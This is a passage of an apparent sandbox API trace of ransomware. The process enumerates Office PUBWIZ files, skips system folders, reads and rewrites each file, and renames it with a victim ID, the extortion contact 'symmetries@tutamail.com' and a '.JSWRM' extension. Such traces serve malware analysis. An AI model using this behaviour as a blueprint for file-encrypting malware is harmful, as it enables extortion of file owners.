ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b8c4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALSO11.POC", cAlternateFileName="")) returned 1 [0140.734] lstrcmpiW (lpString1="CALSO11.POC", lpString2=".") returned 1 [0140.734] lstrcmpiW (lpString1="CALSO11.POC", lpString2="..") returned 1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="...") returned 1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="windows") returned -1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="recovery") returned -1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="perflogs") returned -1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="documents and settings") returned -1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="system volume information") returned -1 [0140.735] lstrcmpiW (lpString1="CALSO11.POC", lpString2="msocache") returned -1 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO11.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALSO11.POC", lpUsedDefaultChar=0x0) returned 11 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO11.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALSO11.POC", lpUsedDefaultChar=0x0) returned 11 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.737] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=112836) returned 1 [0140.737] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.737] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1b8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1b8c0, lpOverlapped=0x0) returned 1 [0140.745] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.745] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1b8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1b8c0, lpOverlapped=0x0) returned 1 [0140.746] CloseHandle (hObject=0x238) returned 1 [0140.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.747] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x696d4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALSO98.POC", cAlternateFileName="")) returned 1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2=".") returned 1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="..") returned 1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="...") returned 1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="windows") returned -1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="recovery") returned -1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="perflogs") returned -1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="documents and settings") returned -1 [0140.747] lstrcmpiW (lpString1="CALSO98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.748] lstrcmpiW (lpString1="CALSO98.POC", lpString2="system volume information") returned -1 [0140.748] lstrcmpiW (lpString1="CALSO98.POC", lpString2="msocache") returned -1 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO98.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALSO98.POC", lpUsedDefaultChar=0x0) returned 11 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALSO98.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALSO98.POC", lpUsedDefaultChar=0x0) returned 11 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.749] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=431828) returned 1 [0140.749] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.749] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.762] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.763] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0140.763] CloseHandle (hObject=0x238) returned 1 [0140.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0140.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0140.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0140.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0140.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0140.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALSO98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calso98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0140.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.765] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4ab, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CATALOG.DPV", cAlternateFileName="")) returned 1 [0140.765] lstrcmpiW (lpString1="CATALOG.DPV", lpString2=".") returned 1 [0140.765] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="..") returned 1 [0140.765] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="...") returned 1 [0140.765] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="windows") returned -1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="recovery") returned -1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="perflogs") returned -1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="documents and settings") returned -1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="system volume information") returned -1 [0140.766] lstrcmpiW (lpString1="CATALOG.DPV", lpString2="msocache") returned -1 [0140.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATALOG.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0140.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATALOG.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0140.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0140.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0140.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.767] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=320683) returned 1 [0140.767] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0140.767] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.780] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.780] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0140.781] CloseHandle (hObject=0x238) returned 1 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0140.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0140.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0140.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0140.781] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0140.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0140.783] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e56, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CATALOG.XML", cAlternateFileName="")) returned 1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2=".") returned 1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="..") returned 1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="...") returned 1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="windows") returned -1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="recovery") returned -1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="perflogs") returned -1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="documents and settings") returned -1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="system volume information") returned -1 [0140.783] lstrcmpiW (lpString1="CATALOG.XML", lpString2="msocache") returned -1 [0140.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0140.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATALOG.XML", lpUsedDefaultChar=0x0) returned 11 [0140.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0140.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0140.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATALOG.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATALOG.XML", lpUsedDefaultChar=0x0) returned 11 [0140.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0140.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0140.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0140.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0140.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.784] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7766) returned 1 [0140.784] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e50) returned 0x27b348 [0140.785] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1e50, lpOverlapped=0x0) returned 1 [0140.786] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.786] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1e50, lpOverlapped=0x0) returned 1 [0140.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.787] CloseHandle (hObject=0x238) returned 1 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0140.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.787] HeapFree (in: 